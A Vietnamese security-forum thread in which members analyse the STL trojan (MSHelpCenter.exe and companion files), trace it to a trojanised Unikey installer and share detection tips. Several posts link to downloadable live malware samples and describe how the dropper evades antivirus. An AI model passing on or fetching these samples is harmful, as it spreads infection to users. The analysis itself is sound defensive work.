1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?) 2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus? 3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình??

Em xin trả lời : 1. Ý thứ (1) và thứ (3) của anh (nội dung gần giống nhau) thì hiện giờ em nghĩ không thể xác định được (với chỉ những file mà asaxin up lên cho chúng ta), có lẽ cần có thêm thời gian để phát hiện ra thêm điều gì đó :). 2. Cái file MSHelpCenter.idx thì em thấy nó sẽ được chạy hay không là phụ thuộc vào nội dung file cấu hình mà MSHelpCenter.exe tải về từ control server. MSHelpCenter.idx được rename thành file .msi, nhận tham số và thực thi. Nhưng với file MSHelpCenter.idx nhận được từ asaxin thì hình như không bao giờ làm nhiệm vụ :D. Edited : Ở trên em nhầm, file MSHelpCenter.idx là file trung gian, nó sẽ được MSHelpCenter.exe rename thành một file random.msi, sau đó MSHelpCenter.exe truyền tham số cho file .msi này (thông qua file .cfg). File .msi sẽ run và kiểm tra tham số và cuối cùng chỉ là để execute file AcrobatUpdater.exe (đã được decrypt từ file images.gif)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

acoustics89 wrote:

Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV... Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây

Hì hì, chỉ nhìn vô cái metadata của MsHelpCenter.exe là thấy không phải hiền lành rồi: Code:

Meta-data
=======
File:    MsHelpCenter.exe
Size:    9332736 bytes
Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:     915e9432ca9414a771071ee0cc115930
SHA1:    9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
ssdeep:  3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
Date:    0x4D1868C7 [Mon Dec 27 10:21:59 2010 UTC]
EP:      0x403272 .text 0/5
CRC:     Claimed: 0x30c13, Actual: 0x8e87d2 [SUSPICIOUS]

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@bolzano_1989 : gui bro mau virus nay http://www.mediafire.com/?xyqk2z1jnp1zcd9 Con này mạo danh Avira GmbH Bác xử lý giùm nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Đúng là ko phải hiền lành anh ạ ! Em cũng RE nó rồi thằng này chạy nhờ 2 cái thằng desktop vơi thằng thumbcache kia. 2 thằng đấy nó dùng để hỗ trợ download với giải mã cho các file mà thằng MS giả này down về và thực thi con VB giả. Hình thức dùng các thư viện riêng như kiểu 2 file trên có vẻ mới nhỉ ? :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

exception — GMT

Hình như 2 file trong http://www.mediafire.com/?xyqk2z1jnp1zcd9 bạn mv1098 gửi là virus Sality cơ mà, không phải của STL đâu.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Ờ là trojan bị nhiễm sality hay sao ý ? em thấy bkav báo thế ??? Có phải của STL đâu :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Cái mẫu này em tính nhờ bro bolzano_1989 nghiên cứu giùm vì em cái CMC mà không diệt được. Máy em đang bị nhiễm virus, đang tính làm chuột bạch để chạy mấy mẫu của STL ở trên mà cái Wireshark nó ko tương thích với card mạng của em

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, sáng giờ đi lang thang, giờ mới về tới nhà. Topic này nhộn nhịp quá ha ! 2 asaxin: các file trong mauboot.rar của cậu, tui đã kiểm tra kỹ, 100% sạch. Còn một số file nữa, còn thiếu. Cậu bật view hidden files lên, hay dùng 7zip, WinRar, tìm và up hộ các file đó lên cái. Cố tìm và up, xoá file StaticCaches.dat. Thằng này đã ăn cắp toàn bộ Passwords của tui đó. Em xin nhắc lại: bà con down dùng em cái tool Everything về cái: http://www.voidtools.com. Gọn, nhẹ, không cần install, tìm bất cứ file nào là trong tích tắc. 2 lequy: Máy cậu chắc chắn có thằng nằm vùng rồi. Bình tĩnh, từ từ mà làm. Đừng quét bằng AV. Tạm thời chịu khó hy sinh một chút, coi như làm việc thiện giúp đỡ anh em. Các link đó đều thuộc host sandret mà anh conmale đã đề cập. Bây giờ cứ để đó, lên mạng down SysInternals Suite, CurrPort, SmartSniff. Đọc help và tập dùng. Chỉ cần nhiêu đó là đủ tìm ra "mèo què" rồi, không cần đao to búa lớn đâu. Bất kỳ tool nào, mình hiểu nó 1 thì nó mang lại cho mình 1, hiểu 10 thì mang lại 10. Tập trung vào Process Explorer và ProcMon, AutoRuns, TCPView. Đọc help cho kỹ. Trong Process Explorer, check menu "Verify Image Signatures" trong Options menu. Duyệt từng process trên upper panel, right click - Properties, click tab TCP/IP. Nếu thấy có connect tới link đó thì xem process đó có verify không (trong tab Image). Nếu không có verify => à à, mày là "mèo què". Còn có, verify từng Dll của process đó, cũng right click - Properties, Verify. Thằng nào không có verified thì up lên. Up lầm còn hơn bỏ sót. Nghi ngờ process nào thì bật ProcMon lên, chỉ cho ProcMon filter chính process đó. Chà, em viết xong, đọc lại thấy méo miệng luôn, lũng cũng quá, không biết lequy có hiểu không nhỉ ? PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus. Đừng băn khoăn thắc mắc nó sạch hay không sạch. Ba cái trò viết EXE, DLL xong vào Resource Version, gõ gõ mấy cái Name, Company, Product fake của MS, Acrobat, Sun... xưa như trái đất rồi, mấy anh stl ? Hỏi mấy anh stl nhé: Giả sử mấy anh dùng fake version info, tìm cách nào đó ăn cắp được signatures của MS và sign nó với PE của mấy anh, thì còn cách nào khác em biết được file PEs của mấy anh là mạo danh ? Dựa trên cái gì: pdb symbol, rich info, compiler/linker ver, coding style ? À sẵn đây em nói luôn 1 bí mật nhé, toàn bộ file của Windows mà MS build đều dùng một internal compiler/linker riêng, không public như Visual Studio đâu. Nó có điểm nhận dạng rất đặc biệt, IDA signature apply vào thì từ 0 tới 0. Sinh code rất quái ! MS coder dùng xong mới trích vài phần public ra ngoài thông qua Visual Studio. Còn jucheck.exe của nobita thì chắc chắn không phải virus của STL. File jucheck của nobita file file PE 32+, build mode 64bit, AMD, code của Sun coder đàng hoàng, rõ ràng minh bạch. Mấy anh STL chắc chưa thử build virus của mấy anh ở 64bit, victim ít quá mà ăn thua gì !

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

mv1098 wrote:

@bolzano_1989 : gui bro mau virus nay http://www.mediafire.com/?xyqk2z1jnp1zcd9 Con này mạo danh Avira GmbH Bác xử lý giùm nhé

Bạn nên gọi đến số 1900571244 để được tư vấn và hỗ trợ bởi CMC InfoSec nếu gặp bất cứ vấn đề gì với CMCIS, đặc biệt là bạn không nên cài virus vô máy tính làm việc của bạn để thử nghiệm virus, đặc biệt là virus của STL. Bạn có thể tìm dùng tool diệt Sality của CMC: http://support.cmclab.net/vn/tpmod/?dl Phiên bản public mới nhất hiện tại: http://support.cmclab.net/vn/tpmod/?dl=item44 Nếu có vấn đề gì nữa, bạn trao đổi với mình qua tin nhắn riêng để tránh làm loãng chủ đề này nhé.

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.

Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN? Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không? Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@PXMMRF: Vậy phiền anh gửi cho e qua email theo profile trên HVA (cafe...@yahoo.com). Em sẽ cài đặt và kiểm tra @TQN: Em hiểu em hiểu, hehe, có điều ko biết lúc e xài được các công cụ trên thì bọn STL này có còn hay không. P/S: Em là dân webmaster, hic, kiểu này xem ra em hơi mạo hiểm, vì nhiều thông tin (chủ yếu là email và server) của e chắc đã bị lộ. Nhưng không sao, của mình thì không ai dễ dàng lấy được. Em sẽ cố gắng sử dụng hết các tool để tổng hợp các thông tin cần thiết. Sau loạt bài về STL, muốn học RCE quá đi mất, nhưng tiếc là hiểu biết về ASM của em = zero.

Phân tích tính chất vài trận DDoS HVA vừa qua.

elt0m — GMT

PXMMRF wrote:

TQN wrote:

Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!
Mình kiểm tra máy mình Xp Sp3 cũng không có PS: cái link này có thông tin gì chăng? http://xml.ssdsandbox.net/view/9cefbb3d8dbee992f914aeecd7bff063 Mình thấy Submission Details date là 5/14/2011 11:24:01 PM

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Và chúc mừng các anh, cuối cùng em cũng search ra được 2 file: MsHelpCenter.idx và MsHelpCenter.exe (trời ơi :(()

Mà em phát hiện ra 2 file này, em vui dã man. Theo suy đoán của em, thì nguồn virus là đây: http://nethoabinh.com/showthread.php?t=315 Và rất rất nhiều các phần mềm khác trên trang này TOP google. Hi vọng là em không làm mọi người đi sai hướng, cách đây khoảng vào lúc 1h AM ngày hôm nay, em đã tìm kiếm thử 2 file này nhưng hoàn toàn không có, vậy tại sao bây giờ lại có ???. Mà em có làm gì đâu chứ. Lạ 1 điều là file unikey em setup vào máy (nếu như dự đoán là trước đây e chưa từng dính) ngày 24, thì các file này thấy ngày tạo ra lại là ngày 23, mà ngày 23 em nhậu tơi bời có biết gì đâu, mỗi pà chị em dùng máy :(. Mà việc chỉnh sửa ngày tháng tạo ra file đối với mấy anh STL là quá quá dễ, em cũng làm được nữa (bằng AutoIT hehe). Hay là em đã vô tình nói cho các anh STL kích hoạt nó lên. Và giờ các thông tin của em tiêu tùng hết, mấy anh STL ơi em là dân đen, đừng đụng đến công việc của em dùm :((. Post sau e sẽ gửi cả đống file này lên.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Đây đống file đây, em public ở đây luôn được chứ mọi người ? http://www.mediafire.com/?k2g07c5792j7cbk Máy em có cài KIS 2012, mọi người xem thử đây có phải là virus ko. Nếu có ai muốn teamviewer vào máy em kiểm tra, rất sẵn lòng luôn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Em nghĩ đây đích thực là đống virus rồi, vì _desktop.ini gì mà đến 2,236 KB luôn. MS chắc hông tạo ra mấy file quỷ này, mà đọc file _desktop.ini thấy có dòng "!This program cannot be run in DOS mode". Thì ... bùn. Mấy anh xúc tiến nhanh nào, em ko muốn sống chung với virus quá lâu đâu :-<

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Mọi người đâu mất tiêu hết rồi :( Bây giờ thì MsHelpCenter.exe đã nằm trong list process của em, và có thêm 1 vài mẫu (thôi thì nhầm còn hơn bỏ sót) Report: http://www.virustotal.com/file-scan/report.html?id=27bb621157b8f697db8db29b7c33e19210f817aeba22f15f1f2cc521d9393a7c-1311680402 File: http://www.mediafire.com/?ryrpp5zn13fja90 Scan Autorun: http://www.mediafire.com/?3l9jdtb3xdm5rxy

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Khônng sao đâu lequi, anh vẫn theo sát máy em mà. Kệ cha tụi nó, châm một chút cũng không sao. Tui nó cũng update không kịp đâu. Bây giờ anh chỉ còn mở có một mắt, sáng mai tính tiếp. Yên tâm nhé em ! MsHelpCenter. exe thì cũ rồi. Tưởng thằng nào mới !

Phân tích tính chất vài trận DDoS HVA vừa qua.

asaxin — GMT

PXMMRF wrote:

TQN wrote:

PS: À mà còn việc này nữa, MSHelpCenter.exe chính là virus. Nhưng nếu nó chỉ có một mình, thì có thể xem như nó clean, sạch sẽ. Nhưng nếu để nó nằm trong ổ của nó gồm MSHelpCenter.idx, thumbcache.db, _desktop.ini, thì tụi nó kết hợp lại thành ổ virus.
Vậy thì có phải là virus -trojạn "BackDoor.Generic 12.APEB" nằm trong file MSHelpCenter.idx sẽ inject các malicious code vào trong file MSHelpCenter.exe, như tôi đã từng dự đoán à? Phải như thế không TQN? Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không? Vậy thì cái file MSHelpCenter.exe này trên máy axasin lấy từ đâu ra? Và nếu "khó" có nó như vậy, thì làm sao STL có thể dễ dàng tạo lập một mang lớn zombies tại VN với hàng trăm ngàn chiếc được? Càng lạ quá!

Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra. PS: Mình có nhớ ở đâu nói rằng (hình như trong diễn đàn này): Nếu bạn là người Việt Nam, sau khi cài xong Windows thì bạn sẽ làm gì? Tất nhiên là làm sao để máy mình có thể xài được tiếng Việt. Vậy thì việc tiếp theo bạn sẽ làm gì? Lên google search, download Unikey, Vietkey... Bọn STL này phải nói là thâm độc thiệt. Chúng nó cài malware lên PC của người Việt, rồi tiếp tay cho kẻ khác làm bậy. Làm sao ngẩng mặt nhìn mọi người đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Vậy thì biết làm gì bây giờ em, asaxin. Chỉ biết chửi tụi nó chứ làm sao bây giờ ! Nhưng không sao, còn nhiều anh em cao thủ RCE đang vạch mặt chúng. Em yên tâm !

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Tạm thời em nên làm gì để STL ko lấy được các thông tin từ máy em đây nhỉ ? Vì máy em có một số thông tin quan trọng :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix. Đúng không mấy anh stl, sự thật mất lòng nhé. Mấy anh tức không ? Làm gì được em ? À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà ! Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha ! Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rookey — GMT

Mải kiểm tra các master websites của STL (mong là đúng của STL) mất thời gian nhiều, nay kiểm lai xem có file nào là MSHelpCenter.exe trong các máy mình không? Kết quả là kiểm 3 máy cài WinXPSP3, 1may Windows7, 2 máy Win2K3 SP2 do chính mình quản lý, nhưng không thấy máy nào có cái file MSHelpCenter.exe cả. Lạ nhỉ? Các bạn thử kiểm máy mình có nó không?

Cái file MSHelpCenter.exe không có trong máy , e kiểm tra 3 máy: 2 win 7, 1 winxp sp3 mà chẳng thấy. Những ai bị nhiễm mới có thì phải .

Phân tích tính chất vài trận DDoS HVA vừa qua.

exception — GMT

lulz, STL = Sex Thuỳ Linh, Sống Tào Lao. Coding như n00b thế này thì anh thất vọng với các chú quá.

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

TQN wrote:

slt tới bây giờ chưa lòi rà một con "con mèo què" nào cho Linux, Unix. Đúng không mấy anh stl, sự thật mất lòng nhé. Tối nay em sương sương vài ba chai rồi, ngứa mồm lên chữi mấy anh chơi. Mấy anh tức không ? Làm gì được em ? À mà sao mấy anh sao không dùn 1 tool hide IP, cho 1 thằng đăng ký HVA này, lên đây, tự xưng tao là stl nè, đối chất công bằng với anh em HVA ha ? Đã fake IP rồi thì thánh cũng tìm không ra mà ! Tới bây giờ, em cũng rất muốn chat với 1 thành viên trong team mấy anh. Nick YM của em mấy anh thừa biết mà ha ! Sau này, đừng đánh giá ai thấp, nữa mùa nữa nhé, mấy anh stl ! Thật sự, khi mấy anh nói với Hà Vy Thoại là em là thằng RCE nữa mùa, em sôi gan lắm. Mấy anh nên biết là tới bây giờ, em chỉ dùng 40% công lực của em để dò theo mấy anh thôi. Chỉ cần em ngồi lỳ máy 2 tháng trời, bất chấp tất cả, em sẽ mò tới tận ổ mấy anh ! Đố mấy anh: nhiều vụ em đã hack, đã quậy tới giờ, FBI vẫn tìm không ra ! Đố mấy anh là những vụ gì ? Anonymous, Lucifer là trò trẻ con với em !

Nếu có nhà tài trợ nào đó cho anh TQN 2 tháng lương để cơm gạo áo tiền thì hay biết mấy nhĩ. Anh RE có nửa mùa hay không, có anh em Cviet, hva... này biết. Ở Việt Nam này cao thủ nhiều hay ko, giỏi đến mức nào thì tôi không biết. Nhưng với tôi, hiện nay anh đang là số 1 của làng CNTT VN

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

asaxin wrote:

Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.

Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

mapthulu — GMT

Bài trả lời của mình sẽ không ăn nhập gì đến những bài trên, nhưng vì sao thấy nó có nét giống giống nên mình đưa lên xem có được gì hay không. Hôm nay server mình bị tấn công, nên mình lọc được vài thông tin Code:

115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.css HTTP/1.1" 200 20399 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /clientscript/vbulletin-core.js?v=408 HTTP/1.1" 200 47757 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET /highslide/highslide.min.js HTTP/1.1" 200 54296 "http://abcdef-site.com/" "-"
115.78.4.183 - - [26/Jul/2011:21:27:05 +0700] "GET / HTTP/1.1" 302 0 "http://abcdef-site.com/" "-"

Không có user-agent, abcd... là domain mình đã ẩn http://cC2.upanh.com/25.587.32753521.OoE0/1.png http://cC5.upanh.com/25.587.32753524.bi30/2.png http://www.stopforumspam.com/ipcheck/115.78.4.183 http://cC7.upanh.com/25.587.32753526.mkB0/3.png Kiểm thử nguyenvietcam77 thì cũng ra nethoabinh http://cC1.upanh.com/25.587.32753540.4vt0/5.png Kiểm thử vài cái nữa thì ra user khác, vậy là IP động rồi http://cC1.upanh.com/25.587.32753530.F8s0/4.png

sửa wrote:

Chỉnh lại cho đỡ kéo màn hình khi mọi người xem

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

TQN wrote:

... Bây giờ cứ để đó, lên mạng down SysInternals Suite, CurrPort, SmartSniff. Đọc help và tập dùng. Chỉ cần nhiêu đó là đủ tìm ra "mèo què" rồi, không cần đao to búa lớn đâu. Bất kỳ tool nào, mình hiểu nó 1 thì nó mang lại cho mình 1, hiểu 10 thì mang lại 10. Tập trung vào Process Explorer và ProcMon, AutoRuns, TCPView. Đọc help cho kỹ. Trong Process Explorer, check menu "Verify Image Signatures" trong Options menu. Duyệt từng process trên upper panel, right click - Properties, click tab TCP/IP. Nếu thấy có connect tới link đó thì xem process đó có verify không (trong tab Image). Nếu không có verify => à à, mày là "mèo què". Còn có, verify từng Dll của process đó, cũng right click - Properties, Verify. Thằng nào không có verified thì up lên. Up lầm còn hơn bỏ sót. ...

Nhờ anh TQN mà em vừa tìm được nguyên nhân vì sao khung search biến mất bấy lâu nay trên máy khi nhấn nút search chỉ còn chú cún ngồi quẩy đuôi đó là Worm/Win32.Polip.gen. Con này núp trong file driver em tải trên site của Nvidia do Antiy-AVL phát hiện, kill ẻm một phát, nhấn nút search, khung search xuất hiện liền.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL. Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB). Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích. accouris89, exception và các anh em khác phân tích tụi này nhé !

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

Cái file Unikey mà bác asaxin em thấy bkav em đang dùng nó diệt rồi :)) hài quá . Bkav mà cũng đã chém được rồi cơ đất =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

TQN wrote:

File Unikey của asaxin và 2 file của lequy đã up lên đều ra virus của STL. Đặc biệt thằng MSHelpCenter.* của lequy up lại khác với MsHelpCenter.* mà ta đã biết, size chỉ còn 2 MB (đã biết: gần 9MB). Bây giờ em phải đi nữa rồi, chắc trưa hay chiều về mới tranh thủ phân tích. accouris89, exception và các anh em khác phân tích tụi này nhé !

File MSHelpCenter.* của lequy là giống với mẫu mà asaxin up. File size khác nhau là vì phần "rác" chèn thêm vào được sinh ngẫu nhiên, còn thực ra file gốc chỉ có : Code:

07/26/2011  11:04 PM           167,936          MsHelpCenter.exe
07/26/2011  11:04 PM            65,536          MsHelpCenter.idx
07/26/2011  11:04 PM            62,976          thumbcache.db
07/26/2011  11:04 PM            36,864          _desktop.ini

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

rang0 wrote:

asaxin wrote:

Chuẩn bị đi làm rồi, nhưng thấy còn nhiều thắc mắc của mọi người nên đã test thử. Bên dưới là link download unikey, đây chính là file đã sinh ra 2 các file mà chú nói. http://www.mediafire.com/?fee5d3428euao0k Đây là bản unikey cháu download lâu lắm rồi không nhớ là download link. Sau khi cháu đã xóa đi các file virus MSHelpCenter.*, tắt Avira, Firewall, thử chạy lại thằng Unikey này để test thì nó là sinh các file virus MSHelpCenter. Như vậy đây chính là thằng đã tạo ra. Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra.
Vậy là đã giải đáp hoàn toàn thắc mắc của anh PXMMRF về việc MSHelpCenter.exe và MSHelpCenter.idx được sinh ra từ đâu rồi :)

Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì) Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:

Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN. Note. -Cái STL Master website-server mà tôi check từ thông tin của axasin chính là cái có quy mô khá hoành tráng, như tôi nói ở trên. - Tôi bắt đầu "hy sinh' 2 máy cài Win7 và Win XP cho nhiễm STL virus vào xem nó thế nào. Hơi mất công và thời gian đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

PXMMRF wrote:

Ờ cảm ơn rang0 và đăc biệt là asaxin (tên em giống tên một cầu thủ Nga chơi cho Arsenal quá. Hì hì) Nhưng mà chưa hết đâu rang0 ạ. Chưa hết ờ câu này của axasin:
Ah, mà hình như thằng này chỉ sinh ra trong Windows 7, máy khác dùng windows xp sp3 không sinh ra
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.

Có 2 nơi mà file fake unikey sẽ drop MSHelpCenter.* và các thư viện đi kèm đó là : hoặc %windir% hoặc %temp% tuỳ vào việc nó gọi OpenSCManager có thành công hay không.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Dựa trên file Fake_Unikey của asaxin, à, "giờ em đã hiểu tại sao" lại có mấy cái Bmp bự bà cố, toàn data rác trong cái đống mshelpcenter.*, thumbcache.db, _desktop.ini. Ặc ặc, ngồi chưa nóng đxx thì sếp rép, phải chạy đi lên chợ Dân Sinh mua đồ rồi !

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Bộ MSHelpCenter mới và cũ không khác nhau: Kịch bản thế này: - Fake Unikey dump ra bộ "mèo" MSHelpCenter, với size nhỏ. - Fake Unikey vỗ béo đám "mèo" này cho béo hơn, size lớn hơn ( tăng lên tới 9MB ). Việc này không khó vì chỉ cần nới rộng kích thước resource rồi ghi 0 vào. Đám mèo này béo nên khó up lên các trang quét virus trực tuyến. Mỗi lần chạy size này lại khác nhau, nếu lấy chữ ký của file không cẩn thận hoặc chỉ diệt theo MD5 thì chưa chắc đã quét được hết đám "mèo". - Fake Unikey sửa lại file Unikey.exe ban đầu, thành file exe thật. xoá sạch dấu vết. @TQN: hôm trước em bảo mà , bọn này code thì ít mà toàn sh!t bên trong

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.

Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P .

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Em dùng Process Explorer để verify MSHelpCenter,exe nhưng không được

